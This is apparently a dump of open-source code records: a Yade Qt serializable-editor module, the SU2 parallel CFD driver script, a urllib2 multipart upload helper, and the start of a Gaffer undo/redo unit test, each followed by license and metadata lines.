import collections import logging # each attribute has one entry associated with itself class EntryData: def __init__(self,name,T,flags=0): self.name,self.T,self.flags=name,T,flags self.lineNo,self.widget=None,None def __init__(self,ser,parent=None,ignoredAttrs=set(),showType=False,path=None): "Construct window, *ser* is the object we want to show." QtGui.QFrame.__init__(self,parent) self.ser=ser self.path=(ser.label if (hasattr(ser,'label') and ser.label) else path) self.showType=showType self.hot=False self.entries=[] self.ignoredAttrs=ignoredAttrs logging.debug('New Serializable of type %s'%ser.__class__.__name__) self.setWindowTitle(str(ser)) self.mkWidgets() self.refreshTimer=QTimer(self) self.refreshTimer.timeout.connect(self.refreshEvent) self.refreshTimer.start(500) def getListTypeFromDocstring(self,attr): "Guess type of array by scanning docstring for :yattrtype: and parsing its argument; ugly, but works." doc=getattr(self.ser.__class__,attr).__doc__ if doc==None: logging.error("Attribute %s has no docstring."%attr) return None m=re.search(r':yattrtype:`([^`]*)`',doc) if not m: logging.error("Attribute %s does not contain :yattrtype:`....` (docstring is '%s'"%(attr,doc)) return None cxxT=m.group(1) logging.debug('Got type "%s" from :yattrtype:'%cxxT) def vecTest(T,cxxT): #regexp=r'^\s*(std\s*::)?\s*vector\s*<\s*(std\s*::)?\s*('+T+r')\s*>\s*$' regexp=r'^\s*(std\s*::)?\s*vector\s*<\s*(shared_ptr\s*<\s*)?\s*(std\s*::)?\s*('+T+r')(\s*>)?\s*>\s*$' m=re.match(regexp,cxxT) return m vecMap={ 'bool':bool,'int':int,'long':int,'Body::id_t':long,'size_t':long, 'Real':float,'float':float,'double':float, 'Vector6r':Vector6,'Vector6i':Vector6i,'Vector3i':Vector3i,'Vector2r':Vector2,'Vector2i':Vector2i, 'Vector3r':Vector3,'Matrix3r':Matrix3,'Se3r':Se3FakeType, 'string':str, #'BodyCallback':BodyCallback, 'IntrCallback':IntrCallback,'BoundFunctor':BoundFunctor,'IGeomFunctor':IGeomFunctor,'IPhysFunctor':IPhysFunctor,'LawFunctor':LawFunctor,'KinematicEngine':KinematicEngine, 'GlShapeFunctor':GlShapeFunctor,'GlStateFunctor':GlStateFunctor,'GlIGeomFunctor':GlIGeomFunctor,'GlIPhysFunctor':GlIPhysFunctor,'GlBoundFunctor':GlBoundFunctor,'GlExtraDrawer':GlExtraDrawer } for T,ret in vecMap.items(): if vecTest(T,cxxT): logging.debug("Got type %s from cxx type %s"%(repr(ret),cxxT)) return (ret,) logging.error("Unable to guess python type from cxx type '%s'"%cxxT) return None def mkAttrEntries(self): if self.ser==None: return try: d=self.ser.dict() except TypeError: logging.error('TypeError when getting attributes of '+str(self.ser)+',skipping. ') import traceback traceback.print_exc() attrs=self.ser.dict().keys(); attrs.sort() for attr in attrs: val=getattr(self.ser,attr) # get the value using serattr, as it might be different from what the dictionary provides (e.g. 
Body.blockedDOFs) t=None doc=getattr(self.ser.__class__,attr).__doc__; if '|yhidden|' in doc: continue if attr in self.ignoredAttrs: continue if isinstance(val,list): t=self.getListTypeFromDocstring(attr) if not t and len(val)>0: t=(val[0].__class__,) # 1-tuple is list of the contained type #if not t: raise RuntimeError('Unable to guess type of '+str(self.ser)+'.'+attr) # hack for Se3, which is returned as (Vector3,Quaternion) in python elif isinstance(val,tuple) and len(val)==2 and val[0].__class__==Vector3 and val[1].__class__==Quaternion: t=Se3FakeType else: t=val.__class__ match=re.search(':yattrflags:`\s*([0-9]+)\s*`',doc) # non-empty attribute flags=int(match.group(1)) if match else 0 #logging.debug('Attr %s is of type %s'%(attr,((t[0].__name__,) if isinstance(t,tuple) else t.__name__))) self.entries.append(self.EntryData(name=attr,T=t)) def getDocstring(self,attr=None): "If attr is *None*, return docstring of the Serializable itself" doc=(getattr(self.ser.__class__,attr).__doc__ if attr else self.ser.__class__.__doc__) if not doc: return '' doc=re.sub(':y(attrtype|default|attrflags):`[^`]*`','',doc) statAttr=re.compile('^.. ystaticattr::.*$',re.MULTILINE|re.DOTALL) doc=re.sub(statAttr,'',doc) # static classes have their proper docs at the beginning, discard static member docs # static: attribute of the type is the same object as attribute of the instance # in that case, get docstring from the class documentation by parsing it if attr and getattr(self.ser.__class__,attr)==getattr(self.ser,attr): doc=self.getStaticAttrDocstring(attr) doc=re.sub(':yref:`([^`]*)`','\\1',doc) import textwrap wrapper=textwrap.TextWrapper(replace_whitespace=False) return wrapper.fill(textwrap.dedent(doc)) def getStaticAttrDocstring(self,attr): ret=''; c=self.ser.__class__ while hasattr(c,attr) and hasattr(c.__base__,attr): c=c.__base__ start='.. 
ystaticattr:: %s.%s('%(c.__name__,attr) if start in c.__doc__: ll=c.__doc__.split('\n') for i in range(len(ll)): if ll[i].startswith(start): break for i in range(i+1,len(ll)): if len(ll[i])>0 and ll[i][0] not in ' \t': break ret+=ll[i] return ret else: return '[no documentation found]' def mkWidget(self,entry): if not entry.T: return None # single fundamental object Klass=_fundamentalEditorMap.get(entry.T,None) getter,setter=lambda: getattr(self.ser,entry.name), lambda x: setattr(self.ser,entry.name,x) if Klass: widget=Klass(self,getter=getter,setter=setter) widget.setFocusPolicy(Qt.StrongFocus) if (entry.flags & AttrFlags.readonly): widget.setEnabled(False) return widget # sequences if entry.T.__class__==tuple: assert(len(entry.T)==1) # we don't handle tuples of other lengths # sequence of serializables T=entry.T[0] if (issubclass(T,Serializable) or T==Serializable): widget=SeqSerializable(self,getter,setter,T,path=(self.path+'.'+entry.name if self.path else None),shrink=True) return widget if (T in _fundamentalEditorMap): widget=SeqFundamentalEditor(self,getter,setter,T) return widget return None # a serializable if issubclass(entry.T,Serializable) or entry.T==Serializable: obj=getattr(self.ser,entry.name) if hasattr(obj,'label') and obj.label: path=obj.label elif self.path: path=self.path+'.'+entry.name else: path=None widget=SerializableEditor(getattr(self.ser,entry.name),parent=self,showType=self.showType,path=(self.path+'.'+entry.name if self.path else None)) widget.setFrameShape(QFrame.Box); widget.setFrameShadow(QFrame.Raised); widget.setLineWidth(1) return widget return None def mkWidgets(self): self.mkAttrEntries() grid=QFormLayout() grid.setContentsMargins(2,2,2,2) grid.setVerticalSpacing(0) grid.setLabelAlignment(Qt.AlignRight) if self.showType: lab=SerQLabel(self,makeSerializableLabel(self.ser,addr=True,href=True),tooltip=self.getDocstring(),path=self.path) lab.setFrameShape(QFrame.Box); lab.setFrameShadow(QFrame.Sunken); lab.setLineWidth(2); lab.setAlignment(Qt.AlignHCenter); lab.linkActivated.connect(yade.qt.openUrl) grid.setWidget(0,QFormLayout.SpanningRole,lab) for entry in self.entries: entry.widget=self.mkWidget(entry) objPath=(self.path+'.'+entry.name) if self.path else None label=SerQLabel(self,serializableHref(self.ser,entry.name),tooltip=self.getDocstring(entry.name),path=objPath) grid.addRow(label,entry.widget if entry.widget else QLabel('<i>unhandled type</i>')) self.setLayout(grid) self.refreshEvent() def refreshEvent(self): for e in self.entries: if e.widget and not e.widget.hot: e.widget.refresh() def refresh(self): pass def makeSerializableLabel(ser,href=False,addr=True,boldHref=True,num=-1,count=-1): ret=u'' if num>=0: if count>=0: ret+=u'%d/%d. '%(num,count) else: ret+=u'%d. 
'%num if href: ret+=(u' <b>' if boldHref else u' ')+serializableHref(ser)+(u'</b> ' if boldHref else u' ') else: ret+=ser.__class__.__name__+' ' if hasattr(ser,'label') and ser.label: ret+=u' “'+unicode(ser.label)+u'”' # do not show address if there is a label already elif addr: import re ss=unicode(ser); m=re.match(u'<(.*) instance at (0x.*)>',ss) if m: ret+=m.group(2) else: logging.warning(u"Serializable converted to str ('%s') does not contain 'instance at 0x…'"%ss) return ret class SeqSerializableComboBox(QFrame): def __init__(self,parent,getter,setter,serType,path=None,shrink=False): QFrame.__init__(self,parent) self.getter,self.setter,self.serType,self.path,self.shrink=getter,setter,serType,path,shrink self.layout=QVBoxLayout(self) topLineFrame=QFrame(self) topLineLayout=QHBoxLayout(topLineFrame); for l in self.layout, topLineLayout: l.setSpacing(0); l.setContentsMargins(0,0,0,0) topLineFrame.setLayout(topLineLayout) buttons=(self.newButton,self.killButton,self.upButton,self.downButton)=[QPushButton(label,self) for label in (u'☘',u'☠',u'↑',u'↓')] buttonSlots=(self.newSlot,self.killSlot,self.upSlot,self.downSlot) # same order as buttons for b in buttons: b.setStyleSheet('QPushButton { font-size: 15pt; }'); b.setFixedWidth(30); b.setFixedHeight(30) self.combo=QComboBox(self) self.combo.setSizeAdjustPolicy(QComboBox.AdjustToContents) for w in buttons[0:2]+[self.combo,]+buttons[2:4]: topLineLayout.addWidget(w) self.layout.addWidget(topLineFrame) # nested layout self.scroll=QScrollArea(self); self.scroll.setWidgetResizable(True) self.layout.addWidget(self.scroll) self.seqEdit=None # currently edited serializable self.setLayout(self.layout) self.hot=None # API compat with SerializableEditor self.setFrameShape(QFrame.Box); self.setFrameShadow(QFrame.Raised); self.setLineWidth(1) # signals for b,slot in zip(buttons,buttonSlots): b.clicked.connect(slot) self.combo.currentIndexChanged.connect(self.comboIndexSlot) self.refreshEvent() # periodic refresh self.refreshTimer=QTimer(self) self.refreshTimer.timeout.connect(self.refreshEvent) self.refreshTimer.start(1000) # 1s should be enough #print 'SeqSerializable path is',self.path def comboIndexSlot(self,ix): # different seq item selected currSeq=self.getter(); if len(currSeq)==0: ix=-1 logging.debug('%s comboIndexSlot len=%d, ix=%d'%(self.serType.__name__,len(currSeq),ix)) self.downButton.setEnabled(ix<len(currSeq)-1) self.upButton.setEnabled(ix>0) self.combo.setEnabled(ix>=0) if ix>=0: ser=currSeq[ix] self.seqEdit=SerializableEditor(ser,parent=self,showType=seqSerializableShowType,path=(self.path+'['+str(ix)+']') if self.path else None) self.scroll.setWidget(self.seqEdit) if self.shrink: self.sizeHint=lambda: QSize(100,1000) self.scroll.sizeHint=lambda: QSize(100,1000) self.sizePolicy().setVerticalPolicy(QSizePolicy.Expanding) self.scroll.sizePolicy().setVerticalPolicy(QSizePolicy.Expanding) self.setMinimumHeight(min(300,self.seqEdit.height()+self.combo.height()+10)) self.setMaximumHeight(100000) self.scroll.setMaximumHeight(100000) else: self.scroll.setWidget(QFrame()) if self.shrink: self.setMaximumHeight(self.combo.height()+10); self.scroll.setMaximumHeight(0) def serLabel(self,ser,i=-1): return ('' if i<0 else str(i)+'. 
')+str(ser)[1:-1].replace('instance at ','') def refreshEvent(self,forceIx=-1): currSeq=self.getter() comboEnabled=self.combo.isEnabled() if comboEnabled and len(currSeq)==0: self.comboIndexSlot(-1) # force refresh, otherwise would not happen from the initially empty state ix,cnt=self.combo.currentIndex(),self.combo.count() # serializable currently being edited (which can be absent) or the one of which index is forced ser=(self.seqEdit.ser if self.seqEdit else None) if forceIx<0 else currSeq[forceIx] if comboEnabled and len(currSeq)==cnt and (ix<0 or ser==currSeq[ix]): return if not comboEnabled and len(currSeq)==0: return logging.debug(self.serType.__name__+' rebuilding list from scratch') self.combo.clear() if len(currSeq)>0: prevIx=-1 for i,s in enumerate(currSeq): self.combo.addItem(makeSerializableLabel(s,num=i,count=len(currSeq),addr=False)) if s==ser: prevIx=i if forceIx>=0: newIx=forceIx # force the index (used from newSlot to make the new element active) elif prevIx>=0: newIx=prevIx # if found what was active before, use it elif ix>=0: newIx=ix # otherwise use the previous index (e.g. after deletion) else: newIx=0 # fallback to 0 logging.debug('%s setting index %d'%(self.serType.__name__,newIx)) self.combo.setCurrentIndex(newIx) else: logging.debug('%s EMPTY, setting index 0'%(self.serType.__name__)) self.combo.setCurrentIndex(-1) self.killButton.setEnabled(len(currSeq)>0) def newSlot(self): dialog=NewSerializableDialog(self,self.serType.__name__) if not dialog.exec_(): return # cancelled ser=dialog.result() ix=self.combo.currentIndex() currSeq=self.getter(); currSeq.insert(ix,ser); self.setter(currSeq) logging.debug('%s new item created at index %d'%(self.serType.__name__,ix)) self.refreshEvent(forceIx=ix) def killSlot(self): ix=self.combo.currentIndex() currSeq=self.getter(); del currSeq[ix]; self.setter(currSeq) self.refreshEvent() def upSlot(self): i=self.combo.currentIndex() assert(i>0) currSeq=self.getter(); prev,curr=currSeq[i-1:i+1]; currSeq[i-1],currSeq[i]=curr,prev; self.setter(currSeq) self.refreshEvent(forceIx=i-1) def downSlot(self): i=self.combo.currentIndex() currSeq=self.getter(); assert(i<len(currSeq)-1); curr,nxt=currSeq[i:i+2]; currSeq[i],currSeq[i+1]=nxt,curr; self.setter(currSeq) self.refreshEvent(forceIx=i+1) def refresh(self): pass # API compat with SerializableEditor SeqSerializable=SeqSerializableComboBox class NewFundamentalDialog(QDialog): def __init__(self,parent,attrName,typeObj,typeStr): QDialog.__init__(self,parent) self.setWindowTitle('%s (type %s)'%(attrName,typeStr)) self.layout=QVBoxLayout(self) self.scroll=QScrollArea(self) self.scroll.setWidgetResizable(True) self.buttons=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel); self.buttons.accepted.connect(self.accept) self.buttons.rejected.connect(self.reject) self.layout.addWidget(self.scroll) self.layout.addWidget(self.buttons) self.setWindowModality(Qt.WindowModal) class FakeObjClass: pass self.fakeObj=FakeObjClass() self.attrName=attrName Klass=_fundamentalEditorMap.get(typeObj,None) initValue=_fundamentalInitValues.get(typeObj,typeObj()) setattr(self.fakeObj,attrName,initValue) if Klass: self.widget=Klass(None,self.fakeObj,attrName) self.scroll.setWidget(self.widget) self.scroll.show() self.widget.refresh() else: raise RuntimeError("Unable to construct new dialog for type %s"%(typeStr)) def result(self): self.widget.update() return getattr(self.fakeObj,self.attrName) class NewSerializableDialog(QDialog): def __init__(self,parent,baseClassName,includeBase=True): import yade.system 
QDialog.__init__(self,parent) self.setWindowTitle('Create new object of type %s'%baseClassName) self.layout=QVBoxLayout(self) self.combo=QComboBox(self) childs=list(yade.system.childClasses(baseClassName,includeBase=False)); childs.sort() if includeBase: self.combo.addItem(baseClassName) self.combo.insertSeparator(1000) self.combo.addItems(childs) self.combo.currentIndexChanged.connect(self.comboSlot) self.scroll=QScrollArea(self) self.scroll.setWidgetResizable(True) self.buttons=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel); self.buttons.accepted.connect(self.accept) self.buttons.rejected.connect(self.reject) self.layout.addWidget(self.combo) self.layout.addWidget(self.scroll) self.layout.addWidget(self.buttons) self.ser=None self.combo.setCurrentIndex(0); self.comboSlot(0) self.setWindowModality(Qt.WindowModal) def comboSlot(self,index): item=str(self.combo.itemText(index)) self.ser=eval(item+'()') self.scroll.setWidget(SerializableEditor(self.ser,self.scroll,showType=True)) self.scroll.show() def result(self): return self.ser def sizeHint(self): return QSize(180,400) class SeqFundamentalEditor(QFrame): def __init__(self,parent,getter,setter,itemType): QFrame.__init__(self,parent) self.getter,self.setter,self.itemType=getter,setter,itemType self.layout=QVBoxLayout() topLineFrame=QFrame(self); topLineLayout=QHBoxLayout(topLineFrame) self.form=QFormLayout() self.form.setContentsMargins(0,0,0,0) self.form.setVerticalSpacing(0) self.form.setLabelAlignment(Qt.AlignLeft) self.formFrame=QFrame(self); self.formFrame.setLayout(self.form) self.layout.addWidget(self.formFrame) self.setLayout(self.layout) # SerializableEditor API compat self.hot=False self.rebuild() # periodic refresh self.refreshTimer=QTimer(self) self.refreshTimer.timeout.connect(self.refreshEvent) self.refreshTimer.start(1000) # 1s should be enough def contextMenuEvent(self, event): index=self.localPositionToIndex(event.pos()) seq=self.getter() if len(seq)==0: index=-1 field=self.form.itemAt(index,QFormLayout.LabelRole).widget() if index>=0 else None menu=QMenu(self) actNew,actKill,actUp,actDown=[menu.addAction(name) for name in (u'☘ New',u'☠ Remove',u'↑ Up',u'↓ Down')] if index<0: [a.setEnabled(False) for a in actKill,actUp,actDown] if index==len(seq)-1: actDown.setEnabled(False) if index==0: actUp.setEnabled(False) if field: field.setStyleSheet('QWidget { background: green }') act=menu.exec_(self.mapToGlobal(event.pos())) if field: field.setStyleSheet('QWidget { background: none }') if not act: return if act==actNew: self.newSlot(index) elif act==actKill: self.killSlot(index) elif act==actUp: self.upSlot(index) elif act==actDown: self.downSlot(index) def localPositionToIndex(self,pos): gp=self.mapToGlobal(pos) for row in range(self.form.count()/2): w,i=self.form.itemAt(row,QFormLayout.FieldRole),self.form.itemAt(row,QFormLayout.LabelRole) for wi in w.widget(),i.widget(): x0,y0,x1,y1=wi.geometry().getCoords(); globG=QRect(self.mapToGlobal(QPoint(x0,y0)),self.mapToGlobal(QPoint(x1,y1))) if globG.contains(gp): return row return -1 def newSlot(self,i): seq=self.getter(); seq.insert(i,_fundamentalInitValues.get(self.itemType,self.itemType())) self.setter(seq) self.rebuild() def killSlot(self,i): seq=self.getter(); assert(i<len(seq)); del seq[i]; self.setter(seq) self.refreshEvent() def upSlot(self,i): seq=self.getter(); assert(i<len(seq)); prev,curr=seq[i-1:i+1]; seq[i-1],seq[i]=curr,prev; self.setter(seq) self.refreshEvent(forceIx=i-1) def downSlot(self,i): seq=self.getter(); assert(i<len(seq)-1); 
curr,nxt=seq[i:i+2]; seq[i],seq[i+1]=nxt,curr; self.setter(seq) self.refreshEvent(forceIx=i+1) def rebuild(self): currSeq=self.getter() # clear everything rows=self.form.count()/2 for row in range(rows): logging.trace('counts',self.form.rowCount(),self.form.count()) for wi in self.form.itemAt(row,QFormLayout.FieldRole),self.form.itemAt(row,QFormLayout.LabelRole): self.form.removeItem(wi) logging.trace('deleting widget',wi.widget()) widget=wi.widget(); widget.hide(); del widget # for some reason, deleting does not make the thing disappear visually; hiding does, however logging.trace('counts after ',self.form.rowCount(),self.form.count()) logging.debug('cleared') # add everything Klass=_fundamentalEditorMap.get(self.itemType,None) if not Klass: errMsg=QTextEdit(self) errMsg.setReadOnly(True); errMsg.setText("Sorry, editing sequences of %s's is not (yet?) implemented."%(self.itemType.__name__)) self.form.insertRow(0,'<b>Error</b>',errMsg) return class ItemGetter(): def __init__(self,getter,index): self.getter,self.index=getter,index def __call__(self): return self.getter()[self.index] class ItemSetter(): def __init__(self,getter,setter,index): self.getter,self.setter,self.index=getter,setter,index def __call__(self,val): seq=self.getter(); seq[self.index]=val; self.setter(seq) for i,item in enumerate(currSeq): widget=Klass(self,ItemGetter(self.getter,i),ItemSetter(self.getter,self.setter,i)) #proxy,'value') self.form.insertRow(i,'%d. '%i,widget) logging.debug('added item %d %s'%(i,str(widget))) if len(currSeq)==0: self.form.insertRow(0,'<i>empty</i>',QLabel('<i>(right-click for menu)</i>')) logging.debug('rebuilt, will refresh now') self.refreshEvent(dontRebuild=True) # avoid infinite recursion it the length would change meanwhile def refreshEvent(self,dontRebuild=False,forceIx=-1): currSeq=self.getter() if len(currSeq)!=self.form.count()/2: #rowCount(): if dontRebuild: return # length changed behind our back, just pretend nothing happened and update next time instead self.rebuild() currSeq=self.getter() for i in range(len(currSeq)): item=self.form.itemAt(i,QFormLayout.FieldRole) logging.trace('got item #%d %s'%(i,str(item.widget()))) widget=item.widget() if not widget.hot: widget.refresh() if forceIx>=0 and forceIx==i: widget.setFocus() def refresh(self): pass # SerializableEditor API
gpl-2.0
-7,651,492,641,948,851,000
44.41601
360
0.727223
false
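The sequence editors in the record above route every element read and write through small getter/setter callables instead of holding references to the elements themselves, so edits made elsewhere are always picked up on the next read. A minimal, Qt-free sketch of that indirection, assuming plain Python stand-ins (all names below are invented for illustration):

# Sketch of the ItemGetter/ItemSetter pattern from SeqFundamentalEditor.rebuild;
# a plain dict plays the role of the edited object.
class ItemGetter(object):
    def __init__(self, getter, index):
        self.getter, self.index = getter, index
    def __call__(self):
        # Re-fetch the whole sequence on every read so concurrent edits are seen.
        return self.getter()[self.index]

class ItemSetter(object):
    def __init__(self, getter, setter, index):
        self.getter, self.setter, self.index = getter, setter, index
    def __call__(self, value):
        seq = self.getter()
        seq[self.index] = value
        self.setter(seq)  # write the whole sequence back through the setter

data = {'seq': [1, 2, 3]}
get_seq = lambda: data['seq']
set_seq = lambda s: data.update(seq=s)
first, set_first = ItemGetter(get_seq, 0), ItemSetter(get_seq, set_seq, 0)
set_first(42)
assert first() == 42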
chenbojian/SU2
SU2_PY/parallel_computation.py
1
3981
#!/usr/bin/env python ## \file parallel_computation.py # \brief Python script for doing the continuous adjoint computation using the SU2 suite. # \author T. Economon, T. Lukaczyk, F. Palacios # \version 3.2.9 "eagle" # # SU2 Lead Developers: Dr. Francisco Palacios ([email protected]). # Dr. Thomas D. Economon ([email protected]). # # SU2 Developers: Prof. Juan J. Alonso's group at Stanford University. # Prof. Piero Colonna's group at Delft University of Technology. # Prof. Nicolas R. Gauger's group at Kaiserslautern University of Technology. # Prof. Alberto Guardone's group at Polytechnic University of Milan. # Prof. Rafael Palacios' group at Imperial College London. # # Copyright (C) 2012-2015 SU2, the open-source CFD code. # # SU2 is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # SU2 is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with SU2. If not, see <http://www.gnu.org/licenses/>. import os, sys, shutil, copy from optparse import OptionParser sys.path.append(os.environ['SU2_RUN']) import SU2 # ------------------------------------------------------------------- # Main # ------------------------------------------------------------------- def main(): # Command Line Options parser=OptionParser() parser.add_option("-f", "--file", dest="filename", help="read config from FILE", metavar="FILE") parser.add_option("-n", "--partitions", dest="partitions", default=2, help="number of PARTITIONS", metavar="PARTITIONS") parser.add_option("-c", "--compute", dest="compute", default="True", help="COMPUTE direct and adjoint problem", metavar="COMPUTE") (options, args)=parser.parse_args() options.partitions = int( options.partitions ) options.compute = options.compute.upper() == 'TRUE' if options.filename == None: raise Exception("No config file provided. Use -f flag") parallel_computation( options.filename , options.partitions , options.compute ) #: def main() # ------------------------------------------------------------------- # CFD Solution # ------------------------------------------------------------------- def parallel_computation( filename , partitions = 0 , compute = True ): # Config config = SU2.io.Config(filename) config.NUMBER_PART = partitions # State state = SU2.io.State() # check for existing files if not compute: state.find_files(config) else: state.FILES.MESH = config.MESH_FILENAME # CFD Solution (direct or adjoint) info = SU2.run.CFD(config) state.update(info) # Solution merging if config.MATH_PROBLEM == 'DIRECT': config.SOLUTION_FLOW_FILENAME = config.RESTART_FLOW_FILENAME elif config.MATH_PROBLEM == 'ADJOINT': config.SOLUTION_ADJ_FILENAME = config.RESTART_ADJ_FILENAME info = SU2.run.merge(config) state.update(info) return state #: parallel_computation() # ------------------------------------------------------------------- # Run Main Program # ------------------------------------------------------------------- # this is only accessed if running from command prompt if __name__ == '__main__': main()
lgpl-2.1
-5,888,083,821,132,230,000
34.864865
93
0.567445
false
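The driver above is normally launched from the shell, but parallel_computation() can also be called from another script. A hedged sketch, assuming a working SU2 installation with SU2_RUN exported; the config file name is hypothetical:

# Command-line form (the config file 'inv_NACA0012.cfg' is an assumption):
#   $ python parallel_computation.py -f inv_NACA0012.cfg -n 4
# Programmatic form:
from parallel_computation import parallel_computation

state = parallel_computation('inv_NACA0012.cfg', partitions=4, compute=True)
print(state.FILES)  # files registered by SU2.io.State during the run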
donaldharvey/snappy
snappy/utils.py
1
2623
import urllib2
import urllib
import os
from mimetools import choose_boundary
from mimetypes import guess_type
import stat

class Singleton(type):
    def __init__(self, name, bases, dict):
        super(Singleton, self).__init__(name, bases, dict)
        self.instance = None

    def __call__(self, *args, **kw):
        if self.instance is None:
            self.instance = super(Singleton, self).__call__(*args, **kw)
        return self.instance

class MultipartDataHandler(urllib2.BaseHandler):
    """
    A urllib2-based multipart/form-data poster, adapted slightly from
    http://odin.himinbi.org/MultipartPostHandler.py and
    http://code.activestate.com/recipes/146306/.
    """
    handler_order = urllib2.HTTPHandler.handler_order - 20

    def http_request(self, request):
        data = request.get_data()
        # only rewrite dict-like data; already-encoded strings pass through
        if data is not None and not isinstance(data, str):
            fields, files = [], []
            for key, value in data.items():
                if type(value) == file:
                    files.append((key, value))
                else:
                    fields.append((key, value))
            if not len(files):
                # no files, so go straight ahead and encode the data
                data = urllib.urlencode(fields, True)
            else:
                content_type, data = self._encode_multipart_formdata(fields, files)
                req_content_type = request.get_header('Content-Type', '')
                if 'multipart/form-data' in req_content_type:
                    request.set_header('Content-Type', content_type)
                else:
                    request.add_unredirected_header('Content-Type', content_type)
            request.add_data(data)
        return request

    https_request = http_request

    def _encode_multipart_formdata(self, fields, files):
        """
        fields is a sequence of (name, value) elements for regular form
        fields. files is a sequence of (name, file object) elements for data
        to be uploaded as files.
        Return (content_type, body) ready for httplib.HTTP instance
        """
        boundary = choose_boundary()
        CRLF = '\r\n'
        L = []
        for (key, value) in fields:
            L.append('--' + boundary)
            L.append('Content-Disposition: form-data; name="%s"' % str(key))
            L.append('')
            L.append(str(value))
        for (key, fd) in files:
            L.append('--' + boundary)
            filename = os.path.basename(fd.name)
            filesize = os.fstat(fd.fileno())[stat.ST_SIZE]
            L.append('Content-Disposition: form-data; name="%s"; filename="%s"'
                     % (str(key), str(filename)))
            mimetype = guess_type(filename)[0] or 'application/octet-stream'
            L.append('Content-Type: %s' % mimetype)
            L.append('Content-Length: %s' % filesize)
            L.append('')
            fd.seek(0)
            L.append(fd.read())
        L.append('--' + boundary + '--')
        L.append('')
        body = CRLF.join(L)
        contenttype = 'multipart/form-data; boundary=%s' % boundary
        return contenttype, body
gpl-3.0
9,019,982,423,787,834,000
32.202532
107
0.676706
false
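Following the upstream MultipartPostHandler recipe the class above is adapted from, the handler is installed into a urllib2 opener and a plain dict (with file objects for uploads) is passed as the request data. A sketch, assuming Python 2; the upload URL and file name are hypothetical:

# Hedged usage sketch for MultipartDataHandler (Python 2).
import urllib2
from utils import MultipartDataHandler

opener = urllib2.build_opener(MultipartDataHandler())
params = {'caption': 'my screenshot',         # plain field
          'file': open('shot.png', 'rb')}     # file object triggers multipart
response = opener.open('http://example.com/upload', params)
print response.read()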
chippey/gaffer
python/GafferTest/UndoTest.py
1
5828
########################################################################## # # Copyright (c) 2011-2012, John Haddon. All rights reserved. # Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above # copyright notice, this list of conditions and the following # disclaimer. # # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided with # the distribution. # # * Neither the name of John Haddon nor the names of # any other contributors to this software may be used to endorse or # promote products derived from this software without specific prior # written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ########################################################################## from __future__ import with_statement import unittest import IECore import Gaffer import GafferTest class UndoTest( GafferTest.TestCase ) : def testSetName( self ) : s = Gaffer.ScriptNode() self.assertEqual( s.undoAvailable(), False ) self.assertEqual( s.redoAvailable(), False ) self.assertRaises( Exception, s.undo ) n = Gaffer.Node() s["a"] = n self.assertEqual( n.getName(), "a" ) n.setName( "b" ) self.assertEqual( n.getName(), "b" ) self.assertEqual( s.undoAvailable(), False ) self.assertEqual( s.redoAvailable(), False ) self.assertRaises( Exception, s.undo ) with Gaffer.UndoContext( s ) : n.setName( "c" ) self.assertEqual( s.undoAvailable(), True ) self.assertEqual( s.redoAvailable(), False ) s.undo() self.assertEqual( s.undoAvailable(), False ) self.assertEqual( s.redoAvailable(), True ) self.assertEqual( n.getName(), "b" ) s.redo() self.assertEqual( s.undoAvailable(), True ) self.assertEqual( s.redoAvailable(), False ) self.assertEqual( n.getName(), "c" ) self.assertRaises( Exception, s.redo ) def testSetInput( self ) : s = Gaffer.ScriptNode() n1 = GafferTest.AddNode() n2 = GafferTest.AddNode() s["n1"] = n1 s["n2"] = n2 with Gaffer.UndoContext( s ) : n1["op1"].setInput( n2["sum"] ) self.assert_( n1["op1"].getInput().isSame( n2["sum"] ) ) s.undo() self.assertEqual( n1["op1"].getInput(), None ) s.redo() self.assert_( n1["op1"].getInput().isSame( n2["sum"] ) ) def testChildren( self ) : s = Gaffer.ScriptNode() n = Gaffer.Node() self.assertEqual( n.parent(), None ) with Gaffer.UndoContext( s ) : s["n"] = n self.assert_( n.parent().isSame( s ) ) s.undo() self.assertEqual( n.parent(), None ) s.redo() self.assert_( n.parent().isSame( s ) ) def testDelete( self ) : s = Gaffer.ScriptNode() n1 = GafferTest.AddNode() n2 = GafferTest.AddNode() n3 = 
